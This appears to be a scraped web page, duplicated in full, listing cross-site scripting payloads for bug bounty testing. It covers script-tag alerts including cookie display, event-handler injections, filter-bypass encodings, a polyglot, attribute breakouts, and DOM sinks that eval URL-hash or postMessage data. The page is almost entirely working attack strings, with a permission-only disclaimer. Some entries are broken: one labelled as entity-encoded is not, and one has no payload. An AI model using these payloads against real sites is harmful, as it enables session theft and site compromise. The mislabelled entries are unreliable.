Web Security Tool

XSS Payload Generator

Collection of XSS payloads for security testing and bug bounty hunting.

Bug BountyWeb Security

Security Testing Only

Only use these payloads on systems you have explicit permission to test.

Custom Payload Encoder

Basic Script Alert

Basic

Classic XSS test payload

<script>alert(1)</script>

Script with Document

Basic

Shows current domain

<script>alert(document.domain)</script>

Script Cookie Steal

Basic

Display cookies (for testing)

<script>alert(document.cookie)</script>

IMG Onerror

Event Handlers

Image error event handler

<img src=x onerror=alert(1)>

SVG Onload

Event Handlers

SVG load event

<svg onload=alert(1)>

Body Onload

Event Handlers

Body load event

<body onload=alert(1)>

Input Onfocus

Event Handlers

Auto-focusing input

<input onfocus=alert(1) autofocus>

Marquee Onstart

Event Handlers

Marquee start event

<marquee onstart=alert(1)>

Details Ontoggle

Event Handlers

Details toggle event

<details open ontoggle=alert(1)>

Video Onerror

Event Handlers

Video source error

<video><source onerror=alert(1)>

Case Variation

Filter Bypass

Mixed case to bypass filters

<ScRiPt>alert(1)</sCrIpT>

Double Encoding

Filter Bypass

Double URL encoded

%253Cscript%253Ealert(1)%253C/script%253E

Null Byte

Filter Bypass

Null byte injection

<scr%00ipt>alert(1)</scr%00ipt>

HTML Entities

Filter Bypass

HTML entity encoded

<script>alert(1)</script>

Unicode Escape

Filter Bypass

Unicode escaped characters

<script>\u0061lert(1)</script>

No Quotes

Filter Bypass

Template literals instead of parentheses

SVG/Animate

Filter Bypass

SVG animate element

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Polyglot Basic

Polyglot

Works in multiple contexts

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Polyglot Short

Polyglot

Short polyglot for attribute context

'-alert(1)-'

Polyglot Medium

Polyglot

Break out of attribute and tag

"><img src=x onerror=alert(1)>//

Location Hash

DOM-based

Execute code from URL hash

<script>eval(location.hash.slice(1))</script>

Document Write

DOM-based

DOM manipulation via document.write

<script>document.write("<img src=x onerror=alert(1)>")</script>

InnerHTML

DOM-based

innerHTML injection

<div id=x></div><script>x.innerHTML="<img src=x onerror=alert(1)>"</script>

PostMessage

DOM-based

PostMessage handler exploitation

<script>window.addEventListener("message",function(e){eval(e.data)})</script>

Back to Tools

Web Security Tool

XSS Payload Generator

Collection of XSS payloads for security testing and bug bounty hunting.

Bug BountyWeb Security

Security Testing Only

Only use these payloads on systems you have explicit permission to test.

Custom Payload Encoder

Basic Script Alert

Basic

Classic XSS test payload

<script>alert(1)</script>

Script with Document

Basic

Shows current domain

<script>alert(document.domain)</script>

Script Cookie Steal

Basic

Display cookies (for testing)

<script>alert(document.cookie)</script>

IMG Onerror

Event Handlers

Image error event handler

<img src=x onerror=alert(1)>

SVG Onload

Event Handlers

SVG load event

<svg onload=alert(1)>

Body Onload

Event Handlers

Body load event

<body onload=alert(1)>

Input Onfocus

Event Handlers

Auto-focusing input

<input onfocus=alert(1) autofocus>

Marquee Onstart

Event Handlers

Marquee start event

<marquee onstart=alert(1)>

Details Ontoggle

Event Handlers

Details toggle event

<details open ontoggle=alert(1)>

Video Onerror

Event Handlers

Video source error

<video><source onerror=alert(1)>

Case Variation

Filter Bypass

Mixed case to bypass filters

<ScRiPt>alert(1)</sCrIpT>

Double Encoding

Filter Bypass

Double URL encoded

%253Cscript%253Ealert(1)%253C/script%253E

Null Byte

Filter Bypass

Null byte injection

<scr%00ipt>alert(1)</scr%00ipt>

HTML Entities

Filter Bypass

HTML entity encoded

<script>alert(1)</script>

Unicode Escape

Filter Bypass

Unicode escaped characters

<script>\u0061lert(1)</script>

No Quotes

Filter Bypass

Template literals instead of parentheses

SVG/Animate

Filter Bypass

SVG animate element

<svg><animate onbegin=alert(1) attributeName=x dur=1s>

Polyglot Basic

Polyglot

Works in multiple contexts

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Polyglot Short

Polyglot

Short polyglot for attribute context

'-alert(1)-'

Polyglot Medium

Polyglot

Break out of attribute and tag

"><img src=x onerror=alert(1)>//

Location Hash

DOM-based

Execute code from URL hash

<script>eval(location.hash.slice(1))</script>

Document Write

DOM-based

DOM manipulation via document.write

<script>document.write("<img src=x onerror=alert(1)>")</script>

InnerHTML

DOM-based

innerHTML injection

<div id=x></div><script>x.innerHTML="<img src=x onerror=alert(1)>"</script>

PostMessage

DOM-based

PostMessage handler exploitation

<script>window.addEventListener("message",function(e){eval(e.data)})</script>